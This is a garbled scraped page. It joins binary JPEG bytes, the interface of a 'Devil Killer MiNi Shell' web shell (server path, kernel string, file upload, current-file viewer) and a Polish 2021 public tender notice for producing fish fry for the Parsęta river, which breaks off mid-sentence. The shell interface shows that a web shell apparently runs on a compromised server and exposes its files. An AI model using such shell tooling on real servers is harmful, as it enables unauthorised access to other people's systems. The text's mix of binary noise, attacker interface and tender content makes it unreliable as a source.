JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023032501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Produkcja narybku dla obwodu rybackiego rzeki Parsęty nr 1. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Związek Miast i Gmin Dorzecza Parsęty</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330052240</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szymanowskiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karlino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zmigdp@parseta.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.parseta.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Związek komunalny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Produkcja narybku dla obwodu rybackiego rzeki Parsęty nr 1. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-abd38b13-2b48-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00230325</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001116/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Produkcja narybku dla obwodu rybackiego rzeki Parsęty nr 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia jest realizowany w ramach projektu „Ochrona łososia atlantyckiego i minoga rzecznego na Specjalnym Obszarze Ochrony Siedlisk Dorzecze Parsęty PLH 320007” współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Infrastruktura i Środowisko oraz współfinansowanego ze środków fundacji Baltic. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.parseta.org.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w przedmiotowym<br/>postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. Zamawiający może komunikować się z wykonawcami za pomocą poczty elektronicznej.<br/>3. Przesłanie wniosków o wyjaśnienie treści SWZ odbywać się będzie przy użyciu środków komunikacji<br/>elektronicznej, przy użyciu poczty elektronicznej lub „miniPortalu” (https://miniportal.uzp.gov.pl).<br/>4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>5. Adres strony internetowej: http://bip.parseta.org.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Składanie ofert i wszelkich dokumentów lub oświadczeń składanych wraz z ofertą dopuszcza się<br/>jedynie przy użyciu środków komunikacji elektronicznej, przy użyciu systemu „miniPortal”<br/>(https://miniportal.uzp.gov.pl) oraz dedykowanego formularza dostępnego na ePUAP<br/>(https://epuap.gov.pl/wps/portal).<br/>2. Korzystanie z „miniPortalu” jest jednoznaczne z akceptacją Regulaminu korzystania z systemu<br/>„miniPortal” oraz Warunków korzystania z elektronicznej platformy usług administracji publicznej<br/>(ePUAP).<br/>3. Wykonawca, zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu „miniPortal” oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp., podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby, sporządza się w postaci<br/>elektronicznej,<br/>w formacie danych .doc, .docx, .rtf, .xps, .odt, .pdf, .gif, .jpg, .jpeg, .ods, .png, .svg, .tif, .txt, .xls, .xlsx,<br/>.xml, .zip, .7z (zalecane).<br/>7. Sposób złożenia oferty wraz z załącznikami, w tym zaszyfrowania oferty, sposób wycofania oferty,<br/>opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.<br/>8. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na ePUAP i udostępnionego również w systemie „miniPortal”.<br/>9. Zamawiający zaleca zapoznanie się z opublikowaną na stronie internetowej Urzędu Zamówień<br/>Publicznych opinią „Jak należy podpisać ofertę w postaci elektronicznej?”:<br/>https://www.uzp.gov.pl/strona-glowna/slider-aktualnosci/jak-nalezy-podpisac-oferte-w-postacielektronicznej/<br/>jak-nalezy-podpisac-oferte-w-postaci-elektronicznej.<br/>10. Ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa się, pod rygorem<br/>nieważności,<br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym (zaawansowany podpis elektroniczny weryfikowany za pomocą certyfikatu podpisu<br/>osobistego).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">opisany w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDPII.271.1.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres przedmiotu zamówienia obejmuje pomoc techniczną, produkcję i dostarczanie materiału<br/>zarybieniowego, w szczególności:<br/>a) pomoc techniczną i wsparcie sprzętowe przy odłowach i przechowywaniu tarlaków, poborze materiału zarybieniowego oraz zarybieniach,<br/>b) odbiór materiału zarybieniowego, wylęg, podchów i chów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77500000-5 - Usługi hodowli zwierząt</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">26 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami:<br/>1)	cena - waga 60%;<br/>2)	częstotliwość odbioru ryb - waga 20%;<br/>3)	nadzór ichtiologiczny przy każdorazowym poborze materiału zarybieniowego - waga 10%;<br/>4)	doświadczenie zawodowe ichtiologa - waga 10 %.<br/>2.	Maksymalna liczba punktów w kryteriach równa jest określonej wadze dla tych kryteriów w %.<br/>3.	Kryterium ceny będzie rozpatrywane na podstawie ceny oferty za wykonanie przedmiotu zamówienia, podanej przez wykonawcę w formularzu oferty. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/>	C = Cmin/Co x 60 pkt, gdzie:<br/>	C - ilość punktów w kryterium ceny,<br/>	Cmin - najniższa zaoferowana cena,<br/>	Co	- cena oferty ocenianej.<br/>4.	Kryterium częstotliwości odbioru ryb z miejsca odłowu będzie rozpatrywane na podstawie zaoferowanej częstotliwości odbioru. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego zestawienia:<br/>1)	codziennie (łącznie z dniami wolnymi od pracy) = 20 pkt;<br/>2)	co dwa dni (łącznie z dniami wolnymi od pracy)	= 10 pkt;<br/>3)	co trzy dni (łącznie z dniami wolnymi od pracy)	= 0 pkt.<br/>4.1.	Wykonawca zobowiązany jest podać w ofercie proponowaną częstotliwość odbioru ryb.<br/>4.2.	Minimalna częstotliwość odbioru ryb, wymagana przez zamawiającego, nie może być rzadsza niż co trzy dni (łącznie z wolnymi dniami od pracy).<br/>4.3.	Podanie przez wykonawcę rzadszej częstotliwości odbioru ryb skutkować będzie odrzuceniem oferty.<br/>4.4.	W przypadku braku podania w ofercie jakiejkolwiek proponowanej częstotliwości, zamawiający uzna, że wykonawca zapewnia częstotliwości odbioru ryb co trzy dni (łącznie z dniami wolnymi od pracy) wymaganą przez zamawiającego.<br/>5.	Kryterium nadzoru ichtiologicznego przy każdorazowym poborze materiału zarybieniowego będzie rozpatrywane na podstawie zaoferowanego przeprowadzenia nadzoru ichtiologicznego ze strony wykonawcy. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego zestawienia:<br/>1)	obecność nadzoru ichtiologicznego	przy każdorazowym poborze materiału zarybieniowego = 10 pkt;<br/>2)	brak nadzoru ichtiologicznego= 0 pkt.<br/>5.1.	Wykonawca zobowiązany jest podać w ofercie proponowany nadzór bądź jego brak.<br/>5.2.	W przypadku braku podania w ofercie informacji o nadzorze, zamawiający uzna, że wykonawca nie zapewnia nadzoru ichtiologa przy każdorazowym poborze materiału zarybieniowego.<br/>6.	Kryterium doświadczenia zawodowego ichtiologa będzie rozpatrywane na podstawie jego stażu zawodowego. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego zestawienia:<br/>1)	równe 20 lat i więcej	= 10 pkt;<br/>2)	od 15 lat do 19 lat = 0 pkt.<br/>6.1. Wykonawca zobowiązany jest podać w ofercie staż pracy ichtiologa w latach.<br/>6.2.	Minimalny staż pracy ichtiologa, wymagany przez zamawiającego, nie może być krótszy niż 15 lat.<br/>6.3.	W przypadku braku podania w ofercie informacji o stażu pracy ichtiologa, zamawiający uzna, że wykonawca dysponuje osobą posiadającą staż pracy w zawodzie ichtiologa od 15 lat do 19 lat.<br/>7.	Zamawiający wybierze jako najkorzystniejszą ofertę, która uzyska łącznie największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe ichtiologa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">częstotliwość odbioru ryb</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">nadzór ichtiologiczny przy każdorazowym poborze materiału zarybieniowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie<br/>art. 108 ust. 1 ustawy Pzp oraz spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. Warunek zostanie spełniony, jeżeli wykonawcy wykażą, że dysponują:<br/>1)	co najmniej 2 osobami posiadającymi co najmniej 15 letnie doświadczenie w chowie lub hodowli ryb; oraz<br/>2)	co najmniej 1 osobą posiadającą co najmniej 15 letnie doświadczenie w zawodzie ichtiologa. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstawy wykluczenia z postępowania, o których mowa w art. 108<br/>ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu<br/>zakłócenie konkurencji ((§ 3 przepisy rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020r. poz. 2415)).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia<br/>oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W zakresie nieuregulowanym niniejszym dokumentem, zastosowanie mają m.in. przepisy<br/>rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020r.<br/>poz. 2415) oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wysokość wadium ustala się w kwocie 5000,00 zł.<br/>2. Wadium wnosi się przed upływem terminu składania ofert, z oznaczeniem przedmiotowego<br/>postępowania.<br/>3. Wadium może być wnoszone w formach określonych w art. 97 ust. 7 ustawy Pzp.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97<br/>ust. 7 pkt 2-4 ustawy Pzp, wykonawca przekazuje zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej.<br/>5. Wadium w pieniądzu wpłacać należy przelewem na rachunek bankowy zamawiającego:<br/>nr konta: 29 1020 2791 0000 7002 0104 0690<br/>6. Poręczenia i gwarancje obejmować winny termin związania wykonawcy ofertą, przy czym<br/>pierwszym dniem terminu związania ofertą jest dzień, w którym upływa termin składania ofert.<br/>7. Gwarancje wadialne winny zawierać co najmniej bezwarunkowe i nieodwołalne w okresie<br/>obowiązywania i wymagalne na pierwsze żądanie zobowiązanie gwaranta (ubezpieczyciela, banku) do wypłaty<br/>zamawiającemu pełnej kwoty wadium w okolicznościach zatrzymania wadium - zgodnie z<br/>przepisami ustawy.<br/>8. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego),<br/>gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz<br/>wskazanie ich siedzib;<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia;<br/>3) kwotę gwarancji/poręczenia;<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia (dotyczy także wspólników spółki<br/>cywilnej) mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane<br/>lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia, dołączają do oferty oświadczenie, z którego<br/>wynika, które (prace) roboty budowlane, dostawy lub usługi, wykonają poszczególni wykonawcy<br/>(art. 117 ust. 3 i 4 ustawy Pzp). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość następujących zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w szczególności w przypadku:<br/>1) zmian stawki podatku od towarów i usług oraz podatku akcyzowego - wysokość<br/>wynagrodzenia wykonawcy zostanie odpowiednio zmieniona o kwotę wynikającą ze<br/>zmienionych stawek tych podatków obowiązujących w dacie powstania obowiązku podatkowego<br/>w czasie trwania umowy, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia<br/>przez wykonawcę;<br/>2) zmian wysokości minimalnego wynagrodzenia za pracę albo wysokości 